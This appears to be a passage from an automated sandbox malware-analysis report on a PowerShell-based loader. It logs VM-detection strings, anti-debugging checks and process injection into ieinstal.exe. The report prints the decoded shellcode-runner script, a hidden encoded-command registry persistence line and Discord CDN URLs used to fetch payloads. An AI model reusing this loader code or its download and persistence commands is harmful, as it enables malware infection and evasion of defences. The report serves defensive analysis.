Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Program Files\qga\qga.exe
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe File opened: C:\Program Files\qga\qga.exe
Source: ieinstal.exe, 0000001E.00000002.398101781286.0000000003590000.00000004.00000800.00020000.00000000.sdmp, ieinstal.exe, 00000021.00000002.398544109967.0000000004EE0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: USER32NTDLLKERNEL32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNMAANEDS3HTTPS://CDN.DISCORDAPP.COM/ATTACHMENTS/933089029631639657/933089094899228722/4687_OIHOPVIA11.BIN
Source: powershell.exe, 00000019.00000002.398155865635.00000000092B8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE<
Source: powershell.exe, 0000001A.00000002.398579916323.00000000085B0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE\
Source: ieinstal.exe, 00000011.00000002.401407177634.0000000002FD0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.398153960658.0000000008EE0000.00000004.00000800.00020000.00000000.sdmp, ieinstal.exe, 0000001E.00000002.398101781286.0000000003590000.00000004.00000800.00020000.00000000.sdmp, ieinstal.exe, 00000021.00000002.398544109967.0000000004EE0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: powershell.exe, 00000004.00000002.397151721605.0000000008334000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXENT
Source: powershell.exe, 00000019.00000002.398153960658.0000000008EE0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: USER32NTDLLKERNEL32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=PROGRAMFILES=\INTERNET EXPLORER\IEINSTAL.EXEWINDIR=\SYSWOW64\MSHTML.TLBPROGRAMFILES=\INTERNET EXPLORER\IEINSTAL.EXEWINDIR=\SYSWOW64\MSHTML.TLB
Source: ieinstal.exe, 00000011.00000002.401407177634.0000000002FD0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: USER32NTDLLKERNEL32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNMAANEDS3\IMG_25254535627256.JPGHTTPS://CDN.DISCORDAPP.COM/ATTACHMENTS/933089228261294143/933089306719961188/IMG_25254535627256.JPGSOFTWARE\APPDATALOW\BILLIOND5C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE -WINDOWSTYLE HIDDEN $OBITUARY=(GET-ITEMPROPERTY -PATH 'HKCU:\SOFTWARE\APPDATALOW\').BILLIOND5;POWERSHELL.EXE -WINDOWSTYLE HIDDEN -ENCODEDCOMMAND($OBITUARY)HTTPS://CDN.DISCORDAPP.COM/ATTACHMENTS/933089029631639657/933089094899228722/4687_OIHOPVIA11.BIN
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe TID: 6660 Thread sleep count: 9857 > 30
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe TID: 6660 Thread sleep time: -49285s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8048 Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6220 Thread sleep count: 8962 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4240 Thread sleep count: 7408 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4156 Thread sleep count: 42 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 756 Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7208 Thread sleep count: 7572 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1520 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Thread sleep count: Count: 9857 delay: -5
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ginqqgem.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\rf0jcwxf.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wxgbxjsa.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_08FC19E5 rdtsc 25_2_08FC19E5
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8403
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Window / User API: threadDelayed 9857
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7803
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8962
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7408
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7572
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe System information queried: ModuleInformation
Source: powershell.exe, 00000004.00000002.397162677750.000000000B2B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.398157984214.000000000B109000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.398588592506.000000000B149000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Guest Shutdown Service
Source: powershell.exe, 00000004.00000002.397162677750.000000000B2B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.398157984214.000000000B109000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.398588592506.000000000B149000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: powershell.exe, 00000019.00000002.398155865635.00000000092B8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe<
Source: powershell.exe, 0000001A.00000002.398579916323.00000000085B0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe\
Source: powershell.exe, 0000001A.00000002.398588592506.000000000B149000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicshutdown
Source: powershell.exe, 00000004.00000002.397162677750.000000000B2B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.398157984214.000000000B109000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.398588592506.000000000B149000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: ieinstal.exe, 00000011.00000002.401407177634.0000000002FD0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: user32ntdllkernel32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=Software\Microsoft\Windows\CurrentVersion\RunMaaneds3\IMG_25254535627256.jpghttps://cdn.discordapp.com/attachments/933089228261294143/933089306719961188/IMG_25254535627256.jpgSOFTWARE\AppDataLow\Billiond5c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden $OBITUARY=(Get-ItemProperty -Path 'HKCU:\SOFTWARE\AppDataLow\').Billiond5;powershell.exe -windowstyle hidden -encodedcommand($OBITUARY)https://cdn.discordapp.com/attachments/933089029631639657/933089094899228722/4687_OIhOpvia11.bin
Source: powershell.exe, 00000004.00000002.397162677750.000000000B2B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.398157984214.000000000B109000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.398588592506.000000000B149000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V PowerShell Direct Service
Source: ieinstal.exe, 0000001E.00000002.398101781286.0000000003590000.00000004.00000800.00020000.00000000.sdmp, ieinstal.exe, 00000021.00000002.398544109967.0000000004EE0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: user32ntdllkernel32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=Software\Microsoft\Windows\CurrentVersion\RunMaaneds3https://cdn.discordapp.com/attachments/933089029631639657/933089094899228722/4687_OIhOpvia11.bin
Source: powershell.exe, 00000019.00000002.398153960658.0000000008EE0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: user32ntdllkernel32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=ProgramFiles=\internet explorer\ieinstal.exewindir=\syswow64\mshtml.tlbProgramFiles=\internet explorer\ieinstal.exewindir=\syswow64\mshtml.tlb
Source: powershell.exe, 00000004.00000002.397162677750.000000000B2B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.398157984214.000000000B109000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.398588592506.000000000B149000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Time Synchronization Service
Source: powershell.exe, 0000001A.00000002.398588592506.000000000B149000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicvss
Source: ieinstal.exe, ieinstal.exe, 00000011.00000002.401404635796.0000000002DBA000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000011.00000002.401403794938.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000011.00000003.399011957621.0000000002DBA000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 0000001E.00000002.398100301334.00000000032E0000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 0000001E.00000002.398098354584.0000000003248000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000021.00000002.398541662516.00000000035E8000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000021.00000002.398543567080.0000000003690000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000021.00000002.398542601563.000000000362B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000004.00000002.397151721605.0000000008334000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exent
Source: ieinstal.exe, 0000001E.00000002.398100301334.00000000032E0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWk7
Source: ieinstal.exe, 00000011.00000002.401407177634.0000000002FD0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.398153960658.0000000008EE0000.00000004.00000800.00020000.00000000.sdmp, ieinstal.exe, 0000001E.00000002.398101781286.0000000003590000.00000004.00000800.00020000.00000000.sdmp, ieinstal.exe, 00000021.00000002.398544109967.0000000004EE0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: powershell.exe, 00000004.00000002.397162677750.000000000B2B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.398157984214.000000000B109000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.398588592506.000000000B149000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Data Exchange Service
Source: powershell.exe, 00000004.00000002.397162677750.000000000B2B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.398157984214.000000000B109000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.398588592506.000000000B149000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Heartbeat Service
Source: powershell.exe, 00000004.00000002.397162677750.000000000B2B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.398157984214.000000000B109000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.398588592506.000000000B149000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Guest Service Interface
Source: powershell.exe, 0000001A.00000002.398588592506.000000000B149000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicheartbeat

Anti Debugging

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Thread information set: HideFromDebugger
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_08FC19E5 rdtsc 25_2_08FC19E5
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_08FC1DE5 mov eax, dword ptr fs:[00000030h] 25_2_08FC1DE5
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_08FC58C5 mov eax, dword ptr fs:[00000030h] 25_2_08FC58C5
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_08FC58C2 mov eax, dword ptr fs:[00000030h] 25_2_08FC58C2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_08FC5046 mov eax, dword ptr fs:[00000030h] 25_2_08FC5046
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_08FC3B43 mov eax, dword ptr fs:[00000030h] 25_2_08FC3B43
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_08FC2530 mov eax, dword ptr fs:[00000030h] 25_2_08FC2530
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_08FC4D30 mov eax, dword ptr fs:[00000030h] 25_2_08FC4D30
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 30_2_03092530 mov eax, dword ptr fs:[00000030h] 30_2_03092530
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 30_2_03091DE5 mov eax, dword ptr fs:[00000030h] 30_2_03091DE5
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 30_2_03094D30 mov eax, dword ptr fs:[00000030h] 30_2_03094D30
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 30_2_03093B43 mov eax, dword ptr fs:[00000030h] 30_2_03093B43
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 30_2_03095046 mov eax, dword ptr fs:[00000030h] 30_2_03095046
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 30_2_030958C2 mov eax, dword ptr fs:[00000030h] 30_2_030958C2
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 30_2_030958C5 mov eax, dword ptr fs:[00000030h] 30_2_030958C5
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 33_2_03232530 mov eax, dword ptr fs:[00000030h] 33_2_03232530
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 33_2_03231DE5 mov eax, dword ptr fs:[00000030h] 33_2_03231DE5
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 33_2_03234D30 mov eax, dword ptr fs:[00000030h] 33_2_03234D30
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 33_2_03233B43 mov eax, dword ptr fs:[00000030h] 33_2_03233B43
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 33_2_03235046 mov eax, dword ptr fs:[00000030h] 33_2_03235046
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 33_2_032358C2 mov eax, dword ptr fs:[00000030h] 33_2_032358C2
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 33_2_032358C5 mov eax, dword ptr fs:[00000030h] 33_2_032358C5
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Process queried: DebugPort
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 17_2_00A56511 Sleep,LdrInitializeThunk,NtProtectVirtualMemory, 17_2_00A56511
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 30_2_030928EC RtlAddVectoredExceptionHandler,NtProtectVirtualMemory, 30_2_030928EC
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 33_2_032328EC RtlAddVectoredExceptionHandler,NtProtectVirtualMemory, 33_2_032328EC

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: A50000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 3090000
Source: C:\Windows\System32\wscript.exe Process created: Base64 decoded #erhvervsku Lejesvende9 Archai8 Sags droshkiesh landska witchbel Hydrant Scullsba airburstu retributo dagpaafu UPTHR morpionf Add-Type -TypeDefinition @"using System;using System.Runtime.InteropServices;public static class SYDYEMENIT1{[DllImport("ntdll.dll")]public static extern int NtAllocateVirtualMemory(int SYDYEMENIT6,ref Int32 Natur9,int seru,ref Int32 SYDYEMENIT,int adju,int SYDYEMENIT7);[DllImport("user32.dll")]public static extern IntPtr CallWindowProcW(uint seru5,int seru6,int seru7,int seru8,int seru9);[DllImport("kernel32.dll")]public static extern void RtlMoveMemory(IntPtr seru1,ref Int32 seru2,int seru3);}"@#fern CAMPHIRE FJEDREN CAPSICIN Scarfedent Inte9 AZYM FIGUR Afgiftsn3 unthornl Sauss3 NOLE Heedlessb MINERA Vinddrevet OPHIDIO MAGNETISE galv miltenes XENO Alle5 nonmonist $SYDYEMENIT3=0;$SYDYEMENIT9=1048576;$SYDYEMENIT8=[SYDYEMENIT1]::NtAllocateVirtualMemory(-1,[ref]$SYDYEMENIT3,0,[ref]$SYDYEMENIT9,12288,64)$Stenf=(Get-ItemProperty -Path "HKCU:\Software\Clip").One$TALAR = [System.Byte[]]::CreateInstance([System.Byte],$Stenf.Length / 2)For($i=0; $i -lt $Stenf.Length; $i+=2){ $TALAR[$i/2] = [convert]::ToByte($Stenf.Substring($i, 2), 16) }for($Lykkedrmb=0; $Lykkedrmb -lt $TALAR.count ; $Lykkedrmb++){[SYDYEMENIT1]::RtlMoveMemory($SYDYEMENIT3+$Lykkedrmb,[ref]$TALAR[$Lykkedrmb],1)}[SYDYEMENIT1]::CallWindowProcW($SYDYEMENIT3, 0,0,0,0)
Source: unknown Process created: Base64 decoded v,K+9nZ)Jt^W{v,)^']zs!5E^rQ#M`iZ.Ybwy^W{v,)^']zwr^u&8PX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: Base64 decoded #erhvervsku Lejesvende9 Archai8 Sags droshkiesh landska witchbel Hydrant Scullsba airburstu retributo dagpaafu UPTHR morpionf Add-Type -TypeDefinition @"using System;using System.Runtime.InteropServices;public static class SYDYEMENIT1{[DllImport("ntdll.dll")]public static extern int NtAllocateVirtualMemory(int SYDYEMENIT6,ref Int32 Natur9,int seru,ref Int32 SYDYEMENIT,int adju,int SYDYEMENIT7);[DllImport("user32.dll")]public static extern IntPtr CallWindowProcW(uint seru5,int seru6,int seru7,int seru8,int seru9);[DllImport("kernel32.dll")]public static extern void RtlMoveMemory(IntPtr seru1,ref Int32 seru2,int seru3);}"@#fern CAMPHIRE FJEDREN CAPSICIN Scarfedent Inte9 AZYM FIGUR Afgiftsn3 unthornl Sauss3 NOLE Heedlessb MINERA Vinddrevet OPHIDIO MAGNETISE galv miltenes XENO Alle5 nonmonist $SYDYEMENIT3=0;$SYDYEMENIT9=1048576;$SYDYEMENIT8=[SYDYEMENIT1]::NtAllocateVirtualMemory(-1,[ref]$SYDYEMENIT3,0,[ref]$SYDYEMENIT9,12288,64)$Stenf=(Get-ItemProperty -Path "HKCU:\Software\Clip").One$TALAR = [System.Byte[]]::CreateInstance([System.Byte],$Stenf.Length / 2)For($i=0; $i -lt $Stenf.Length; $i+=2){ $TALAR[$i/2] = [convert]::ToByte($Stenf.Substring($i, 2), 16) }for($Lykkedrmb=0; $Lykkedrmb -lt $TALAR.count ; $Lykkedrmb++){[SYDYEMENIT1]::RtlMoveMemory($SYDYEMENIT3+$Lykkedrmb,[ref]$TALAR[$Lykkedrmb],1)}[SYDYEMENIT1]::CallWindowProcW($SYDYEMENIT3, 0,0,0,0)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -NoExit -EncodedCommand "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
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -encodedcommand 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
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rf0jcwxf.cmdline
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB0A3.tmp" "c:\Users\user\AppData\Local\Temp\CSC1F7F6E38280547C88EA9F93164256468.TMP"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wxgbxjsa.cmdline
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ginqqgem.cmdline
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES330D.tmp" "c:\Users\user\AppData\Local\Temp\CSCED2B87455DE24E4084C3BB361169C34B.TMP"
